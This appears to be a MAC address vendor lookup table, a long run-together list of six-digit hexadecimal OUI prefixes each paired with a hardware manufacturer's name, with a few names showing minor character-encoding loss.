Compal Information (kunshan) +F42833 Mmpc +244F1D iRule +BC9CC5 Beijing Huafei Technology +505065 Takt +A4A4D3 Bluebank Communication TechnologyLtd +74F413 Maxwell Forest +34F0CA Shenzhen Linghangyuan Digital Technology +30B5F1 Aitexin Technology +882950 Dalian Netmoon Tech Develop +08CD9B samtec automotive electronics & software GmbH +28FCF6 Shenzhen Xin KingBrand enterprises +4C26E7 Welgate +94D60E shenzhen yunmao information technologies +7C6AC3 GatesAir +3CCD5A Technische Alternative GmbH +604826 Newbridge Technologies Int. +24D13F Mexus +702C1F Wisol +9CBD9D SkyDisk +74C621 Zhejiang Hite Renewable Energy +44C306 Sifrom +54A31B Shenzhen Linkworld Technology +5CE7BF New Singularity International Technical Development +1CEEE8 Ilshin Elecom +6C641A Penguin Computing +E036E3 Stage One International +34DE34 zte +34466F HiTEM Engineering +2C39C1 Ciena +6C2C06 OOO NPP Systemotechnika-NN +54EE75 Wistron InfoComm(Kunshan)Co. +60812B Custom Control Concepts +F86601 Suzhou Chi-tek information technology +FC4AE9 Castlenet Technology +34E42A Automatic Bar Controls +20A787 Bointec Taiwan Limited +A481EE Nokia +54C80F TP-Link Technologies +D42122 Sercomm +EC1766 Research Centre Module +7CFF62 Huizhou Super Electron Technology +A0D12A Axpro Technology +30C750 MIC Technology Group +442938 NietZsche enterpriseLtd. +D881CE AHN +E0D31A Eques Technology, Limited +9C3EAA EnvyLogic +909864 Impex-Sat GmbH&Co KG +DCE578 Experimental Factory of Scientific Engineering and Special Design Department +949F3F Optek Digital Technology company limited +987770 Pep Digital Technology (Guangzhou) +4411C2 Telegartner Karl Gartner GmbH +9451BF Hyundai ESG +4C7F62 Nokia +F03FF8 R L Drake +B0C554 D-Link International +54D163 Max-tech +E41218 ShenZhen Rapoo Technology +2C8A72 HTC +4486C1 Siemens Low Voltage & Products +C83168 eZEX +F84A73 Eumtech +880F10 Huami Information Technology +24336C Private +C46BB4 myIDkey +ECE512 tado GmbH +30918F Technicolor +FC09F6 Guangdong Tonze Electric +687848 Westunitis +A8B9B3 Essys +64B370 PowerComm Solutions +D86595 Toy's Myth +D8DD5F Balmuda +88D962 Canopus Systems US +24C848 mywerk system GmbH +2C18AE Trend Electronics +E097F2 Atomax +90F3B7 Kirisun Communications +DCAD9E GreenPriz +B4827B AKG Acoustics GmbH +908C44 H.K Zongmu Technology +0C473D Hitron Technologies. +4C5E0C Routerboard.com +9CF8DB shenzhen eyunmei technology +644214 Swisscom Energy Solutions AG +8CCDA2 ACTP +CC720F Viscount Systems +906717 Alphion India Private Limited +24050F MTN Electronic +40B6B1 Sungsam +98FF6A Otec(shanghai)technology +AC6BAC Jenny Science AG +707C18 Adata Technology +FC4B1C Intersensor S.r.l. +1879A2 GMJ Electric Limited +E0C86A Shenzhen Tw-scie +80BAE6 Neets +041A04 WaveIP +50206B Emerson Climate Technologies Transportation Solutions +C8EE75 Pishion International +CC3429 TP-Link Technologies +407496 Afun Technology +18C8E7 Shenzhen Hualistone Technology +3CF748 Shenzhen Linsn Technology Development +9C039E Beijing Winchannel Software Technology +F8A963 Compal Information (kunshan) +48A2B7 Kodofon JSC +443C9C Pintsch Tiefenbach GmbH +F81CE5 Telefonbau Behnke GmbH +BC2D98 ThinGlobal +7C72E4 Unikey Technologies +181BEB Actiontec Electronics +CC7498 Filmetrics +7C6AB3 IBC Technologies +F0321A Mita-Teknik A/S +4CD7B6 Helmer Scientific +746F3D Contec GmbH +483D32 Syscor Controls & Automation +9031CD Onyx Healthcare +A0E453 Sony Mobile Communications AB +404A18 Addrek Smart Solutions +C4C0AE Midori Electronic +90837A General Electric Water & Process Technologies +089758 Shenzhen Strong Rising Electronics,Ltd DongGuan Subsidiary +B424E7 Codetek Technology +44EE30 Budelmann Elektronik GmbH +38DBBB Sunbow Telecom +2493CA Voxtronic Technology Computer-Systeme GmbH +688AB5 EDP Servicos +407A80 Nokia +F06130 Advantage Pharmacy Services +D481CA iDevices +B898F7 Gionee Communication Equipment,Ltd.ShenZhen +C0F1C4 Pacidal +D858D7 CZ.NIC, z.s.p.o. +10B713 Private +E8E770 Warp9 Tech Design +78CA5E Elno +98FFD0 Lenovo Mobile Communication Technology +50A054 Actineon +48EE86 UTStarcom (China) +5056A8 Jolla +D09D0A Linkcom +54FB58 Wiseware +C0A0BB D-Link International +28A1EB Etek Technology (shenzhen) +4CCBF5 zte +F0F5AE Adaptrum +F42896 Specto Paineis Eletronicos Ltda +1C7B21 Sony Mobile Communications AB +9C2840 Discovery Technology +F89FB8 Yazaki Energy System +F037A1 Huike Electronics (shenzhen) +6CD1B0 Wing Sing Electronics Hong Kong Limited +A4F522 Chofu Seisakusho +7CE56B Esen Optoelectronics Technology +CC4703 Intercon Systems +5C3327 Spazio Italia srl +F85BC9 M-Cube Spa +8005DF Montage Technology Group Limited +78E8B6 zte +041B94 Host Mobility AB +CC2A80 Micro-Biz intelligence solutions +3859F8 MindMade Sp. z o.o. +5C026A Applied Vision +7CBD06 AE Refusol +94BA56 Shenzhen Coship Electronics +2894AF Samhwa Telecom +740EDB Optowiz +00A2FF abatec group AG +D095C7 Pantech +D02C45 littleBits Electronics +5027C7 Technart +248000 Westcontrol AS +F84A7F Innometriks +58639A TPL Systemes +0C9B13 Shanghai Magic Mobile TelecommunicationLtd. +3C15EA Tescom +B4CCE9 Prosyst +34A3BF Terewave. +B0CE18 Zhejiang shenghui lighting +503CC4 Lenovo Mobile Communication Technology +286D97 Samjin +ACE42E SK hynix +08EF3B MCS Logic +806C8B Kaeser Kompressoren AG +048C03 ThinPAD Technology (Shenzhen)CO. +84E629 Bluwan SA +34CD6D CommSky Technologies +C47F51 Inventek Systems +E8D4E0 Beijing BenyWave Technology +681D64 Sunwave Communications +F4CD90 Vispiron Rotec GmbH +E438F2 Advantage Controls +C8F386 Shenzhen Xiaoniao Technology +E8CE06 SkyHawke Technologies +B0808C Laser Light Engines +C419EC Qualisys AB +981094 Shenzhen Vsun communication technology +082719 APS systems/electronic AG +D4AC4E BODi rS +B03850 Nanjing Cas-zdc IOT System +C0DA74 Hangzhou Sunyard Technology +34A843 Kyocera Display +6C5779 Aclima +40BD9E Physio-Control +581CBD Affinegy +F82BC8 Jiangsu Switter +60C397 2Wire +3065EC Wistron (ChongQing) +5CA3EB Lokel s.r.o. +04DF69 Car Connectivity Consortium +28DB81 Shanghai Guao Electronic Technology +9CB793 Creatcomm Technology +A0B100 ShenZhen Cando Electronics +40560C In Home Displays +9436E0 Sichuan Bihong Broadcast & Television New Technologies +D4D50D Southwest Microwave +B8CD93 Penetek +D8FEE3 D-Link International +F8516D Denwa Technology +1078CE Hanvit SI +D8DA52 Apator +107A86 U&U Engineering +980D2E HTC +842F75 Innokas Group +D4BF7F Upvel +5061D6 Indu-Sol GmbH +68EC62 Yodo Technology +F07F0C Leopold Kostal GmbH &Co. KG +5C22C4 DAE EUN Eletronics +08482C Raycore Taiwan +F4B381 WindowMaster A/S +74F102 Beijing Hchcom Technology +080EA8 Velex s.r.l. +0086A0 Private +60FE1E China Palms Telecom.Ltd +841E26 Kernel-i +349D90 Heinzmann GmbH & KG +D4016D TP-Link Technologies +FC1186 Logic3 plc +50CD32 NanJing Chaoran Science & Technology +683EEC Ereca +44619C FONsystem +BCBAE1 Arec +18FA6F ISC applied systems +9C9726 Technicolor +880905 Mtmcommunications +C42628 Airo Wireless +745F00 Samsung Semiconductor +541FD5 Advantage Electronics +90FF79 Metro Ethernet Forum +E08177 GreenBytes +48F230 Ubizcore +B0C95B Beijing Symtech +DCA989 Macandc +C05E6F V. Stonkaus firma Kodinis Raktas +6CD146 Smartek d.o.o. +E0C2B7 Masimo +F82EDB RTW GmbH & KG +60A44C Asustek Computer +045FA7 Shenzhen Yichen Technology Development +983F9F China SSJ (Suzhou) Network Technology +F02329 Showa Denki +6499A0 AG Elektronik AB +A80180 Imago Technologies Gmbh +044CEF Fujian Sanao Technology +DC1DD4 Microstep-MIS spol. s r.o. +E01877 Fujitsu Limited +149448 BLU Castle +40516C Grandex International +D0D471 Mvtech +34ADE4 Shanghai Chint Power Systems +1853E0 Hanyang DigitechLtd +C4E032 Ieee 1904.1 Working Group +ACDBDA Shenzhen Geniatech +A42C08 Masterwork Automodules +60B185 ATH system +504F94 Loxone Electronics GmbH +8C078C Flow Data +8887DD DarbeeVision +807B1E Corsair Components +A0E25A Amicus SK, s.r.o. +F87B62 Fastwel International, Taiwan Branch +B49842 zte +9C9C1D Starkey Labs +90CC24 Synaptics +AC1702 Fibar Group sp. z o.o. +7898FD Q9 Networks +3C57D5 FiveCo +4C2258 cozybit +10EA59 Cisco Spvtg +34FA40 Guangzhou Robustel Technologies, Limited +181725 Cameo Communications +E82E24 Out of the Fog Research +1C52D6 Flat Display Technology +40270B Mobileeco +ACE97F IoT Tech Limited +301518 Ubiquitous Communication +101248 ITG +106FEF Ad-Sol Nissin +A036F0 Comprehensive Power +180CAC Canon +00DB1E Albedo Telecom SL +74943D AgJunction +080C0B SysMik GmbH Dresden +C8FB26 Cisco Spvtg +7CC8AB Acro Associates +C4DA26 Noblex SA +1CC316 MileSight Technology +C4E7BE SCSpro +105F49 Cisco Spvtg +4495FA Qingdao Santong Digital TechnologyLtd +60F2EF VisionVera International +B01266 Futaba-Kikaku +909DE0 Newland Design + Assoc. +64D814 Cisco Systems +6CE4CE Villiger Security Solutions AG +30F33A +plugg srl +58CF4B Lufkin Industries +C4393A SMC Networks +D45C70 Wi-Fi Alliance +08EBED World Elite Technology +60BC4C EWM Hightec Welding GmbH +F41E26 Simon-Kaloi Engineering +C44567 Sambon Precison and Electronics +D0738E Dong OH Precision +E8718D Elsys Equipamentos Eletronicos Ltda +3C83B5 Advance Vision Electronics +808287 Atcom Technologyltd. +28A192 Gerp Solution +A08C15 Gerhard D. Wempe KG +8CE081 zte +485261 Soreel +10FBF0 KangSheng +3C57BD Kessler Crane +600F77 SilverPlus +6851B7 PowerCloud Systems +A44E2D Adaptive Wireless Solutions +3CC12C AES +0CCDFB Edic Systems +2CE2A8 DeviceDesign +B49DB4 Axion Technologies +D8182B Conti Temic Microelectronic GmbH +304449 Plath Gmbh +94FD2E Shanghai Uniscope Technologies +64A341 Wonderlan (Beijing) Technology +8CAE4C Plugable Technologies +D8D5B9 Rainforest Automation +C0A0E2 Eden Innovations +E8ABFA Shenzhen Reecam Tech.Ltd. +58874C Lite-on Clean Energy Technology +E85BF0 Imaging Diagnostics +20DC93 Cheetah Hi-Tech +0CD9C1 Visteon +68AB8A RF IDeas +70E24C SAE IT-systems GmbH & KG +88615A Siano Mobile Silicon +30215B Shenzhen Ostar Display Electronic +DC028E zte +DCB058 Brkert Werke GmbH +641C67 Digibras Industria DO Brasils/a +C8E1A7 Vertu Limited +88D7BC DEP Company +F49466 CountMax +4CAB33 KST technology +5CE0F6 NIC.br- Nucleo de Informacao e Coordenacao do Ponto BR +00E666 Arima Communications +F8E4FB Actiontec Electronics +5887E2 Shenzhen Coship Electronics +B4DFFA Litemax Electronics +48F8B3 Cisco-Linksys +681CA2 Rosewill +7C092B Bekey A/S +D808F5 Arcadia Networks +84DF0C Net2grid BV +3CB87A Private +E425E9 Color-Chip +F44848 Amscreen Group +441319 WKK Technology +088F2C Hills Sound Vision & Lighting +3C9F81 Shenzhen Catic Bit Communications Technology +18339D Cisco Systems +642216 Shandong Taixin Electronic +D43D7E Micro-Star Int'l +64517E Long BEN (dongguan) Electronic Technology +0C57EB Mueller Systems +48282F zte +745327 Commsen, Limited +E47185 Securifi +881036 Panodic(ShenZhen) Electronics Limted +18F87A i3 International +142DF5 Amphitech +90F72F Phillips Machine & Welding +B45570 Borea +5C5015 Cisco Systems +0CD2B5 Binatone Telecommunication Pvt. +4846F1 Uros Oy +1CD40C Kriwan Industrie-Elektronik GmbH +747B7A ETH +1C7C45 Vitek Industrial Video Products +C8AE9C Shanghai TYD Elecronic Technology +A44C11 Cisco Systems +782544 Omnima Limited +D4DF57 Alpinion Medical Systems +5048EB Beijing Haihejinsheng Network Technology +40AC8D Data Management +54466B Shenzhen Cztic Electronic Technology +1C3477 Innovation Wireless +4423AA Farmage +A0EF84 Seine Image Int'l +AC7A42 iConnectivity +5869F9 Fusion Transactive +B0C83F Jiangsu Cynray IOT +CC14A6 Yichun MyEnergy Domain +98D686 Chyi Lee industry +20443A Schneider Electric Asia Pacific +28C914 Taimag +4C7897 Arrowhead Alarm Products +AC0A61 Labor S.r.L. +B482C5 Relay2 +60D1AA Vishal Telecommunications Pvt +CCC104 Applied Technical Systems +709BA5 Shenzhen Y&D Electronics +EC42F0 ADL Embedded Solutions +10BD18 Cisco Systems +B0435D NuLEDs +A82BD6 Shina System +8CC7AA Radinet Communications +20014F Linea Research +80D18B Hangzhou I'converge Technology +B4A4B5 Zen Eye +489153 Weinmann Gerte fr Medizin GmbH + KG +549D85 EnerAccess +5CEE79 Global Digitech +9CE10E NCTech +28F606 Syes srl +A0C3DE Triton Electronic Systems +AC3FA4 Taiyo Yuden +0C130B Uniqoteq +808698 Netronics Technologies +2C00F7 XOS +809393 Xapt GmbH +00DEFB Cisco Systems +90AC3F BrightSign +7CACB2 Bosch Software Innovations GmbH +0043FF Ketron S.r.l. +745798 Trumpf Laser Gmbh + KG +38E08E Mitsubishi Electric +E4FA1D PAD Peripheral Advanced Design +4C9E80 Kyokko Electric +A826D9 HTC +F03A55 Omega Elektronik AS +24B88C Crenus +98BC57 SVA Technologiesltd +98FE03 Ericsson - North America +F0EEBB Vipar Gmbh +54D0ED Axim Communications +A49005 China Greatwall Computer Shenzhen +3055ED Trex Network +D4A02A Cisco Systems +0463E0 Nome Oy +BCA4E1 Nabto +900A3A PSG Plastic Service GmbH +FC5B26 MikroBits +5CC213 Fr. Sauter AG +581D91 Advanced Mobile Telecom +9CB008 Ubiquitous Computing Technology +00376D Murata Manufacturing +E0EF25 Lintes Technology +CCEED9 Vahle Deto Gmbh +645EBE Yahoo! Japan +CCC50A Shenzhen Dajiahao Technology +D01AA7 UniPrint +B08E1A URadio Systems +E05DA6 Detlef Fink Elektronik & Softwareentwicklung +0C7523 Beijing Gehua Catv Network +BC2C55 Bear Flag Design +04F4BC Xena Networks +608C2B Hanson Technology +EC1120 FloDesign Wind Turbine +C495A2 Shenzhen Weijiu Industry AND Trade Development +0C9E91 Sankosha +F48771 Infoblox +04F021 Compex Systems Pte +8823FE TTTech Computertechnik AG +98AAD7 Blue Wave Networking +20107A Gemtek Technology +502267 PixeLINK +9092B4 Diehl BGT Defence GmbH & KG +806007 RIM +38A851 Moog +90185E Apex Tool Group GmbH & OHG +649EF3 Cisco Systems +34D09B MobilMAX Technology +087572 Obelux Oy +9C1FDD Accupix +506441 Greenlee +80946C Tokyo Radar +00FA3B Cloos Electronic Gmbh +28CD1C Espotel Oy +D824BD Cisco Systems +D878E5 Kuhn SA +C49300 8Devices +4C3910 Newtek Electronics +5808FA Fiber Optic & telecommunication +7C94B2 Philips Healthcare Pcci +200505 Radmax Communication Private Limited +5848C0 Coflec +C8F704 Building Block Video +C8AF40 marco Systemanalyse und Entwicklung GmbH +AC319D Shenzhen TG-NET Botone Technology +08D09F Cisco Systems +B81413 Keen High Holding(HK) +2037BC Kuipers Electronic Engineering BV +A887ED ARC Wireless +983571 Sub10 Systems +B05CE5 Nokia +CC6BF1 Sound Masking +B82CA0 Honeywell HomMed +94AE61 Alcatel Lucent +7CA61D MHL +5CCEAD Cdyne +9CA3BA Sakura Internet +709756 Happyelectronics +D4206D HTC +1866E3 Veros Systems +00B338 Kontron Design Manufacturing Services (M) Sdn. Bhd +94DE0E SmartOptics AS +A429B7 bluesky +7C6B33 Tenyu Tech +CCB8F1 Eagle Kingdom Technologies Limited +DC2E6A HCT. +34255D Shenzhen Loadcom Technology +1897FF TechFaith Wireless Technology Limited +8C8E76 taskit GmbH +B4D8DE iota Computing +54CDA7 Fujian Shenzhou Electronic +1000FD LaonPeople +603553 Buwon Technology +B89BC9 SMC Networks +48022A B-Link Electronic Limited +48A6D2 GJsun Optical Science and Tech +186D99 Adanis +D44B5E Taiyo Yuden +B40C25 Palo Alto Networks +40BF17 Digistar Telecom. SA +E4AFA1 Hes-so +58920D Kinetic Avionics Limited +207600 Actiontec Electronics +84D32A Ieee 1905.1 +F8E7B5 tech Tecnologia Ltda +0462D7 Alstom Hydro France +CCC8D7 Cias Elettronica srl +64AE0C Cisco Systems +A446FA AmTRAN Video +2804E0 Fermax Electronicau. +FC01CD Fundacion Tekniker +88E7A6 iKnowledge Integration +98E79A Foxconn(NanJing) Communication +54F5B6 Oriental Pacific International Limited +34A55D Technosoft International SRL +D0C282 Cisco Systems +449CB5 Alcomp +24E6BA JSC Zavod im. Kozitsky +8C8A6E Estun Automation Technoloy +E0ED1A vastriver Technology +685E6B PowerRay +4C32D9 M Rutty Holdings +603FC5 COX +182B05 8D Technologies +54A9D4 Minibar Systems +4861A3 Concern Axion JSC +D89685 GoPro +08A12B ShenZhen EZL Technology +94319B Alphatronics BV +08FC52 OpenXS BV +205B5E Shenzhen Wonhe Technology +3CC99E Huiyang Technology +C8A1BA Neul +AC02EF Comsis +C43A9F Siconix +0418B6 Private +D4024A Delphian Systems +84248D Zebra Technologies +24EC99 Askey Computer +B8621F Cisco Systems +B45CA4 Thing-talk Wireless Communication Technologies Limited +AC8ACD Roger D.wensker, G.wensker sp.j. +984246 SOL Industry PTE. +28A574 Miller Electric Mfg. +3826CD Andtek +C436DA Rusteletech +00FC70 Intrepid Control Systems +D0AFB6 Linktop Technology +444F5E Pan Studios +0C3956 Observator instruments +A49981 FuJian Elite Power Tech +B83A7B Worldplay (Canada) +783F15 EasySYNC +88B168 Delta Control GmbH +20B399 Enterasys +18B79E Invoxia +147411 RIM +5C56ED 3pleplay Electronics Private Limited +0838A5 Funkwerk plettac electronic GmbH +BCCD45 Voismart +78028F Adaptive Spectrum and Signal Alignment (assia) +D4A425 Smax Technology +98F8DB Marini Impianti Industriali s.r.l. +140708 Private +24C9DE Genoray +605464 Eyedro Green Solutions +54055F Alcatel Lucent +405539 Cisco Systems +B8BEBF Cisco Systems +38FEC5 Ellips +24C86E Chaney Instrument +D4D898 Korea CNO Tech +5070E5 He Shan World Fair Electronics Technology Limited +28EE2C Frontline Test Equipment +802275 Beijing Beny Wave Technology +BC8199 Basic +24470E PentronicAB +A4DB2E Kingspan Environmental +F44EFD Actions Semiconductor,Ltd.(Cayman Islands) +34BCA6 Beijing Ding Qing Technology +D4C1FC Nokia +48DCFB Nokia +688470 eSSys +F08BFE Costel. +5435DF Symeo GmbH +F43D80 FAG Industrial Services GmbH +D4F0B4 Napco Security Technologies +40B3FC Logital Limited +D05FCE Hitachi Data Systems +8C82A8 Insigma Technology +3C2763 SLE quality engineering GmbH & KG +A44B15 Sun Cupid Technology (HK) +508ACB Shenzhen Maxmade Technology +7032D5 Athena Wireless Communications +7CF0BA Linkwell Telesystems Pvt +CCC62B Tri-Systems +ACF97E Elesys +4C7367 Genius Bytes Software Solutions GmbH +DC2B66 InfoBLOCK S.A. de C.V. +14F0C5 Xtremio +C027B9 Beijing National Railway Research & Design Institute of Signal & Communication +70A41C Advanced Wireless Dynamics S.L. +285132 Shenzhen Prayfly Technology +4C3B74 Vogtec(h.k.) +509772 Westinghouse Digital +D85D84 CAx soft GmbH +78A683 Precidata +BC6784 Environics Oy +B4E0CD Fusion-io +50AF73 Shenzhen Bitland Information Technology +488E42 Digalog Gmbh +286046 Lantech Communications Global +A424B3 FlatFrog Laboratories AB +A4856B Q Electronics +84EA99 Vieworks +DCCBA8 Explora Technologies +58EECE Icon Time Systems +A41BC0 Fastec Imaging +E01F0A Xslent Energy Technologies. +F40321 BeNeXt +00B033 OAO Izhevskiy radiozavod +707EDE Nastec +CCBE71 OptiLogix BV +7CDD90 Shenzhen Ogemray Technology +C07E40 Shenzhen XDK Communication Equipment +E44F29 MA Lighting Technology GmbH +6CAB4D Digital Payment Technologies +60DA23 Estech +28F358 2C - Trifonov & +304C7E Panasonic Electric Works Automation Controls Techno +64D1A3 Sitecom Europe BV +3831AC WEG +2C7ECF Onzo +10E3C7 Seohwa Telecom +E84040 Cisco Systems +0C8112 Private +7C7D41 Jinmuyu Electronics +4C1480 Noregon Systems +60F673 Terumo +E48AD5 RF Window +24F0FF GHT +4C07C9 Computer Office +40F4EC Cisco Systems +2872F0 Athena +9C807D Syscable Korea +180B52 Nanotron Technologies GmbH +64DE1C Kingnetic Pte +540496 Gigawave +C8C126 ZPM Industria e Comercio Ltda +041D10 Dream Ware +88DD79 Voltaire +4468AB Juin Company, Limited +902E87 LabJack +C8208E Storagedata +00B342 MacroSAN Technologies +4CB9C8 Conet +0474A1 Aligera Equipamentos Digitais Ltda +1064E2 ADFweb.com s.r.l. +CC34D7 Gewiss +B4CFDB Shenzhen Jiuzhou Electric +C46354 U-Raku +20FEDB M2M SolutionS. +405FBE RIM +E05B70 Innovid +043604 Gyeyoung I&T +34F968 Atek Products +D0D0FD Cisco Systems +706417 Orbis Tecnologia Electrica +64FC8C Zonar Systems +28ED58 JAG Jakob AG +9873C4 Sage Electronic Engineering +B8797E Secure Meters (UK) Limited +2005E8 OOO InProMedia +E0D10A Katoudenkikougyousyo +1C0656 IDY +C44B44 Omniprint +6015C7 IdaTech +188ED5 TP Vision Belgium N.V. - innovation site Brugge +8CE7B3 Sonardyne International +0034F1 Radicom Research +A8B0AE Leoni +60893C Thermo Fisher Scientific P.O.A. +5C17D3 LGE +70A191 Trendsetter Medical +58BC27 Cisco Systems +34D2C4 Rena Gmbh Print Systeme +E0A670 Nokia +E061B2 Hangzhou Zenointel Technology +4491DB Shanghai Huaqin Telecom Technology +14D76E Conch Electronic +CC6B98 Minetec Wireless Technologies +C4CD45 Beijing Boomsense Technology +D0BB80 SHL Telemedicine International +1C83B0 Linked IP GmbH +F065DD Primax Electronics +706582 Suzhou Hanming Technologies +94C7AF Raylios Technology +6854F5 enLighted +008C10 Black Box +20A2E7 Lee-Dickens +8CDD8D Wifly-City System +EC98C1 Beijing Risbo Network Technology +ECC38A Accuenergy (canada) +D48FAA Sogecam Industrial +38A95F Actifio +A0DDE5 Sharp +94A7BC BodyMedia +6C9B02 Nokia +84DB2F Sierra Wireless +A45055 busware.de +C89383 Embedded Automation +D49E6D Wuhan Zhongyuan Huadian Science & Technology +94F720 Tianjin Deviser Electronics Instrument +EC2368 IntelliVoice +B45253 Seagate Technology +04DD4C Velocytech +B4C810 Umpi Elettronica +38580C Panaccess Systems GmbH +24AF54 Nexgen Mediatech +F0F9F7 IES GmbH & KG +CC0CDA Miljovakt AS +C01242 Alpha Security Products +90507B Advanced Panmobil Systems Gmbh & KG +00B5D6 Omnibit +F893F3 Volans +7C3E9D Patech +4C60D5 airPointe of New Hampshire +D45297 nSTREAMS Technologies +78EC22 Shanghai Qihui Telecom Technology +F8D756 Simm Tronic Limited +E087B1 Nata-Info +A8B1D4 Cisco Systems +4CBAA3 Bison Electronics +EC7C74 Justone Technologies +3C1A79 Huayuan Technology +30E48E Vodafone UK +08512E Orion Diagnostica Oy +9CF61A UTC Fire and Security +C802A6 Beijing Newmine Technology +C84C75 Cisco Systems +284C53 Intune Networks +102D96 Looxcie +3037A6 Cisco Systems +ACEA6A Genix Infocomm +5C35DA There Oy +005218 Wuxi Keboda ElectronLtd +08F2F4 Net One Partners +68EFBD Cisco Systems +183BD2 BYD Precision Manufacture Company +F45595 Hengbao +C08B6F S I Sistemas Inteligentes Eletrnicos Ltda +BCA9D6 Cyber-Rain +0CDDEF Nokia +80C63F Remec Broadband Wireless +F09CBB RaonThink +FCE23F Clay Paky SPA +B0E39D CAT System +78A6BD Daeyeon Control&instrument +481249 Luxcom Technologies +B43DB2 Degreane Horizon +C4823F Fujian Newland Auto-ID Tech. +F4C795 WEY Elektronik AG +087695 Auto Industrial +ACCE8F HWA YAO Technologies +042F56 Atocs (shenzhen) +084E1C H2A Systems +A4B121 Arantia 2010 S.L. +9889ED Anadem Information +147373 Tubitak Uekae +982D56 Resolution Audio +00A2DA Inat Gmbh +6C3E9C KE Knestel Elektronik GmbH +F89D0D Control Technology +1010B6 McCain +081FF3 Cisco Systems +5CE286 Nortel Networks +2CCD27 Precor +6C5E7A Ubiquitous Internet Telecom +D828C9 General Electric Consumer and Industrial +C86C1E Display Systems +EC6C9F Chengdu Volans Technology +CCCC4E Sun Fountainhead USA. +60D30A Quatius Limited +BC9DA5 Dascom Europe Gmbh +942E63 Finscur +C8D2C1 Jetlun (Shenzhen) +F0BCC8 MaxID (Pty) +406186 Micro-star Int'l +74E537 Radspin +7C08D9 Shanghai B-Star Technology +448E81 VIG +2046F9 Advanced Network Devices (dba:AND) +0C8230 Shenzhen Magnus Technologies +50934F Gradual Tecnologia Ltda. +34EF8B NTT Communications +38E98C Reco +F02408 Talaris (Sweden) AB +A06986 Wellav Technologies +F02FD8 Bi2-Vision +C86CB6 Optcom +C45976 Fugoo Coorporation +B0C8AD People Power Company +A870A5 UniComm +80177D Nortel Networks +E8DAAA VideoHome Technology +647D81 Yokota Industrial +8891DD Racktivity +C4198B Dominion Voting Systems +C83A35 Tenda Technology +F4ACC1 Cisco Systems +584CEE Digital One Technologies, Limited +E064BB DigiView S.r.l. +4C63EB Application Solutions (Electronics and Vision) +C01E9B Pixavi AS +64168D Cisco Systems +24D2CC SmartDrive Systems +7C6C8F AMS Neve +C4E17C U2S +A8C222 TM-Research +50252B Nethra Imaging Incorporated +A4DA3F Bionics +9C4E8E ALT Systems +448312 Star-Net +687924 ELS-GmbH & KG +38BB23 OzVision America +003A99 Cisco Systems +04C05B Tigo Energy +5C1437 Thyssenkrupp Aufzugswerke GmbH +9C55B4 I.S.E. S.r.l. +DC2C26 Iton Technology Limited +4CC452 Shang Hai Tyd. Electon Technology +F0C24C Zhejiang FeiYue Digital Technology +08184C A. S. Thomas +5CE223 Delphin Technology AG +FC6198 NEC Personal Products +F871FE The Goldman Sachs Group +D8C3FB Detracom +201257 Most Lucky Trading +D49C28 JayBird +A03A75 PSS Belgium N.V. +746B82 Movek +0C8411 A.O. Smith Water Products +F8E968 Egker Kft. +E8DFF2 PRF +006440 Cisco Systems +D0E40B Wearable +AC867E Create New Technology (HK) Limited Company +58F67B Xia Men UnionCore Technology +A02EF3 United Integrated Services +A8CE90 CVC +00271F Mipro Electronics +00271A Geenovo Technology +002714 Grainmustards +002717 CE Digital(Zhenjiang)Co. +002708 Nordiag ASA +002701 Incostartec Gmbh +002702 SolarEdge Technologies +0026FB AirDio Wireless +0026F5 Xrplus +002632 Instrumentation Technologies d.d. +00262C IKT Advanced Technologies s.r.o. +002626 Geophysical Survey Systems +00261F SAE Magnetics (H.K.) +002620 Isgus Gmbh +00261A Femtocomm System Technology +002613 Engel Axil S.L. +00260D Mercury Systems +0025D8 Korea Maintenance +0025CC Mobile Communications Korea Incorporated +0025C5 Star Link Communication Pvt. +0025C6 kasercorp +0025C0 ZillionTV +0025B4 Cisco Systems +0025B9 Cypress Solutions +0025AD Manufacturing Resources International +002600 Teac Australia +002607 Enabling Technology +0025FB Tunstall Healthcare A/S +0025FA J&M Analytik AG +0025F6 netTALK.com +0025EF I-TEC +0025E9 i-mate Development +002690 I DO IT +00268A Terrier SC +002689 General Dynamics Robotic Systems +002684 Kisan System +002683 Ajoho Enterprise +00267D A-Max Technology Macao Commercial Offshore Company Limited +002677 Deif A/S +002671 Autovision +00266A Essensium NV +0026EF Technology Advancement Group +0026E9 SP +0026DC Optical Systems Design +0026D6 Ningbo Andy Optoelectronic +0026CF Deka R&D +0026D0 Semihalf +0026CA Cisco Systems +0026C9 Proventix Systems +0026C3 Insightek +002664 Core System Japan +002658 T-Platforms (Cyprus) Limited +002645 Circontrol +00263F Lios Technology Gmbh +002639 T.M. Electronics +0026BD Jtec Card & Communication +0026B3 Thales Communications +0026AD Arada Systems +0026A9 Strong Technologies +0026A3 FQ Ingenieria Electronica +00269C Itus Japan +002696 Noolix +002484 Bang and Olufsen Medicom a/s +002486 DesignArt Networks +00247F Nortel Networks +002478 Mag Tech Electronics Limited +002471 Fusion MultiSystems dba Fusion-io +002473 3com Europe +002460 Giaval Science Development +00245B Raidon Technology +00244E RadChips +002447 Kaztek Systems +002442 Axona Limited +00243D Emerson Appliance Motors and Controls +002528 Daido Signal +002523 OCP +00251E Rotel Technologies +002519 Viaas +002514 PC Worth Int'l +00250D GZT Telkom-Telmor sp. z o.o. +002506 A.I. Antitaccheggio Italia SRL +002508 Maquet Cardiopulmonary AG +00257A Camco Produktions- und Vertriebs-gmbh Fr Beschallungs- und Beleuchtungsanlagen +00257F CallTechSolution +002573 ST Electronics (Info-Security) Pte +00256E Van Breda +00256D Broadband Forum +002560 Ibridge Networks & Communications +00255B CoachComm +0024E2 Hasegawa Electric +0024DB Alcohol Monitoring Systems +0024CF Inscape Data +0024C8 Broadband Solutions Group +0024C3 Cisco Systems +0024C0 NTI Comodo +0024B6 Seagate Technology +0024BB Central +0024B1 Coulomb Technologies +0024AA Dycor Technologies +0024A3 Sonim Technologies +00249E ADC-Elektronik GmbH +00248B Hybus +002492 Motorola, Broadband Solutions Group +002497 Cisco Systems +002554 Pixel8 Networks +00254D Singapore Technologies Electronics Limited +00254E Vertex Wireless +002537 Runcom Technologies +00253E Sensus Metering Systems +002541 Maquet Critical Care AB +00252D Kiryung Electronics +0025A6 Central Network Solution +0025A1 Enalasys +00259A CEStronics GmbH +002593 DatNet Informatikai Kft. +002594 Eurodesign BG +00258E The Weather Channel +00258A Pole/Zero +002589 Hills Industries Limited +002584 Cisco Systems +002501 JSC Supertel +0024FA Hilger u. Kern Gmbh +0024F5 NDS Surgical Imaging +0024EE Wynmax +0024E7 Plaster Networks +0023F2 TVLogic +0023E8 Demco +0023E1 Cavena Image Products AB 